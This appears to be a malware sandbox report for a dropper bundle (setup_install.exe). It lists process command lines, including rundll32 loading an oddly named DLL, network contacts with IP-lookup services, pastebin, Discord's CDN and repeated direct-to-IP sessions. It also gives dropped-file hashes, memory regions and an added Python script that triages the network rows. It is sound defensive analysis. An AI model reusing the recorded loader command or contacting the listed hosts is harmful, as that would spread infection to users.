"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1900 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2144,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2220,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2524 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3064,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3080 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3088,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4520 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3632 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4960,i,3790354685201985527,17542741552534622116,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4972 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4168 -ip 4168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4168 -ip 4168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1128

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4168 -ip 4168

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4168 -s 1352

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I

Network

Country Destination Domain (empty when the connection went straight to an IP) Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 hsiens.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 niemannbest.me udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 233.135.159.162.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 propanla.com udp
FI 135.181.129.119:4805 tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ppp-gl.biz udp
US 107.178.223.183:80 ppp-gl.biz tcp
N/A 127.0.0.1:59238 tcp
N/A 127.0.0.1:59240 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 183.223.178.107.in-addr.arpa udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
GB 172.217.16.228:443 www.google.com udp
US 107.178.223.183:80 ppp-gl.biz tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 24.19.67.172.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 172.67.19.24:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 51.178.186.149:80 tcp
FI 135.181.129.119:4805 tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 104.155.138.21:80 ppp-gl.biz tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 107.178.223.183:80 ppp-gl.biz tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
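Most of the table above is sandbox noise: reverse lookups (`*.in-addr.arpa`), loopback, mDNS and Chrome's own traffic. What a responder wants out of it are the direct-to-IP TCP sessions on unusual ports that repeat for the whole run (135.181.129.119:4805 and 194.104.136.5:46013 here), the IP/geolocation checks and the abused hosting services the summary tags call out. The following is an added triage script, not part of the report: the rows are a subset copied from the table above (the domain column is absent for direct-to-IP rows, which is why the parser accepts three or four fields), and the two service lists are the author's assumption drawn from the summary tags, not a published list.

```python
from collections import Counter

# Rows copied from the Network table above (a subset). Format is
# "Country Destination [Domain] Proto"; Domain is missing for direct-to-IP rows.
NETWORK_ROWS = """\
US 8.8.8.8:53 hsiens.xyz udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 162.159.135.233:443 cdn.discordapp.com tcp
US 208.95.112.1:80 ip-api.com tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 172.67.19.24:443 pastebin.com tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
GB 172.217.16.228:443 www.google.com tcp
N/A 127.0.0.1:59238 tcp
N/A 224.0.0.251:5353 udp
NL 45.9.20.13:80 tcp
"""

# Assumption: analyst-maintained lists matching the summary tags "Looks up
# external IP address / geolocation via web service" and "Legitimate hosting
# services abused for malware hosting/C2".
IP_CHECK = {"ip-api.com", "iplogger.org"}
ABUSED_HOSTING = {"cdn.discordapp.com", "pastebin.com"}
WEB_PORTS = {80, 443, 8080}


def parse_row(line):
    """Split one table row into fields; returns None for headers or blank lines."""
    parts = line.split()
    if len(parts) == 4:
        country, dest, domain, proto = parts
    elif len(parts) == 3:
        (country, dest, proto), domain = parts, ""
    else:
        return None
    if ":" not in dest:
        return None                      # the header line, not a destination
    ip, port = dest.rsplit(":", 1)
    return {"country": country, "ip": ip, "port": int(port),
            "domain": domain, "proto": proto}


def triage_network(text):
    """Bucket the rows: DNS names asked for, IP-check and abused-hosting contacts,
    direct-to-IP sessions on web ports, and direct-to-IP sessions on other ports
    with a repeat count (a steady count across the run is beacon-like)."""
    result = {"dns_queries": set(), "ip_check": set(), "abused_hosting": set(),
              "other_domains": set(), "direct_ip_web_port": set(),
              "direct_ip_nonstd_port": Counter()}
    for line in text.splitlines():
        row = parse_row(line)
        if row is None:
            continue
        if row["port"] == 53 and row["proto"] == "udp":
            if not row["domain"].endswith(".in-addr.arpa"):   # reverse lookups are noise
                result["dns_queries"].add(row["domain"])
            continue
        if row["ip"].startswith(("127.", "224.")):             # loopback, mDNS
            continue
        key = f"{row['ip']}:{row['port']}"
        if row["domain"] in IP_CHECK:
            result["ip_check"].add(row["domain"])
        elif row["domain"] in ABUSED_HOSTING:
            result["abused_hosting"].add(row["domain"])
        elif row["domain"]:
            result["other_domains"].add(row["domain"])
        elif row["port"] in WEB_PORTS:
            result["direct_ip_web_port"].add(key)
        else:
            result["direct_ip_nonstd_port"][key] += 1
    result["dns_queries"] = sorted(result["dns_queries"])
    return result


if __name__ == "__main__":
    for bucket, value in triage_network(NETWORK_ROWS).items():
        print(f"{bucket:24} {value}")
```

Running it over the full table rather than this subset gives the same two non-standard-port endpoints, with counts in the dozens; those, plus the direct-to-IP port-80 hosts, are the entries worth blocking first, while the IP-check and hosting services are better used as hunting pivots than as block-list entries.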

Files

C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe

MD5 789258af8927e9426e113f79a5c2ebcf
SHA1 6c64f717f5fc68e602760fefbc2221fd35fd7530
SHA256 f17e3e76cebd7d97c927151c727d210dca439be0142db2db5a0ccc70d95b9923
SHA512 20cbd892411768fd4774fcb9f47f4eff754687808e58af8597714030e0705b53072b0128b8c32f5254836664276b242f8327427d0d6975cdfe6c3a90f4945ec3

C:\Users\Admin\AppData\Local\Temp\7zS81984237\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS81984237\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS81984237\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/4160-55-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81984237\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/4160-59-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81984237\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/4160-72-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4160-71-0x0000000064941000-0x000000006494F000-memory.dmp

memory/4160-70-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4160-69-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4160-68-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4160-67-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4160-66-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4160-65-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4160-64-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4160-63-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4160-62-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4160-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe

MD5 37a1c118196892aa451573a142ea05d5
SHA1 4144c1a571a585fef847da516be8d89da4c8771e
SHA256 a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a
SHA512 aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe

MD5 ba8541c57dd3aae16584e20effd4c74c
SHA1 5a49e309db2f74485db177fd9b69e901e900c97d
SHA256 dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA512 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe

MD5 d08cc10c7c00e13dfb01513f7f817f87
SHA1 f3adddd06b5d5b3f7d61e2b72860de09b410f571
SHA256 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d
SHA512 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe

MD5 44cfc728f9fbacd834c9b10ce768d41a
SHA1 6589a1435a2ba5ec11a312de5f339597831227d0
SHA256 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68
SHA512 dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

MD5 a98672182143436478fdb3806ef6cd5a
SHA1 5d93bb55d9e7915afb11361f42a4c9c6393718b3
SHA256 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528
SHA512 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe

MD5 1902e1df4ecf3bf7bcfc0c53b992cd24
SHA1 a0c9cde0b2113466a820fa6ebcccfdcd93b26b97
SHA256 c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720
SHA512 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe

MD5 06ee576f9fdc477c6a91f27e56339792
SHA1 4302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512 e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe

MD5 85ef31a707d583032b8526d16e8883a8
SHA1 16beed53fc46bf75cf4081d73dc843f4d8298569
SHA256 bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409
SHA512 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe

MD5 ecc773623762e2e326d7683a9758491b
SHA1 ad186c867976dc5909843418853d54d4065c24ba
SHA256 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838
SHA512 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe

MD5 39fbed3967544cc6a59e1d1152cdcc35
SHA1 b9e974a506f3be7fc78574ae008e7686093eb82d
SHA256 cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6
SHA512 cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

memory/2956-89-0x0000000000490000-0x0000000000498000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209c4b463b.exe

MD5 a729d63514511766fcdd2de19cdbd017
SHA1 737827e5c0ab0adc287d3b3bb16d26a9a42f0939
SHA256 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728
SHA512 ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe

MD5 7d44a083f0e81baf1ecb264b93bdc9a5
SHA1 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82

C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe

MD5 8aaec68031b771b85d39f2a00030a906
SHA1 7510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256 dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA512 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

memory/4312-107-0x0000000000C70000-0x0000000000CA6000-memory.dmp

memory/932-106-0x0000000000550000-0x0000000000568000-memory.dmp

memory/3456-110-0x0000000004BD0000-0x0000000004C46000-memory.dmp

memory/932-112-0x0000000002650000-0x0000000002656000-memory.dmp

memory/3456-108-0x0000000000330000-0x00000000003A2000-memory.dmp

memory/2228-100-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4312-114-0x0000000004E30000-0x0000000005458000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/3456-118-0x0000000004B50000-0x0000000004B6E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-AEMOE.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/4312-133-0x0000000004C40000-0x0000000004C62000-memory.dmp

memory/3456-137-0x00000000052D0000-0x0000000005874000-memory.dmp

memory/1632-139-0x0000000003440000-0x0000000003464000-memory.dmp

memory/4312-138-0x0000000005560000-0x00000000058B4000-memory.dmp

memory/4312-135-0x0000000004DC0000-0x0000000004E26000-memory.dmp

memory/4312-134-0x0000000004CE0000-0x0000000004D46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ziincgli.k55.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4664-147-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1632-150-0x00000000035C0000-0x00000000035E2000-memory.dmp

memory/4068-151-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1632-153-0x0000000003990000-0x00000000039A2000-memory.dmp

memory/1632-157-0x0000000006A40000-0x0000000006A7C000-memory.dmp

memory/1632-159-0x0000000006A80000-0x0000000006ACC000-memory.dmp

memory/2228-160-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1632-154-0x0000000006930000-0x0000000006A3A000-memory.dmp

memory/1632-152-0x0000000006310000-0x0000000006928000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-32RV3.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4160-176-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/4160-179-0x0000000064940000-0x0000000064959000-memory.dmp

memory/4160-178-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/4160-177-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/4160-173-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4160-170-0x0000000000400000-0x000000000051C000-memory.dmp

memory/4312-183-0x0000000005A20000-0x0000000005A3E000-memory.dmp

memory/4492-195-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4980-191-0x0000000000400000-0x00000000016BC000-memory.dmp

